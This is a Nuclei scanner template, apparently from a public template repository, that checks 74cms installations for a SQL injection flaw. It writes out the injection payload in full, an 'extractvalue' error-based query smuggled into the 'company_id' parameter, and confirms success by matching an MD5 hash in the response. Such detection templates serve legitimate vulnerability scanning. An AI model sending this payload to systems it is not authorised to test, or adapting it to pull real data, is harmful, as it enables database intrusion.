nuclei-templates/vulnerabilities/other/74cms-sqli.yaml

18 lines
425 B
YAML

id: 74cms-sqli
info:
author: princechaddha
name: 74cms Sql Injection
severity: high
tags: 74cms,sqli
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'
matchers:
- type: word
words:
- "e807f1fcf82d132f9bb018ca6738a19f"
part: body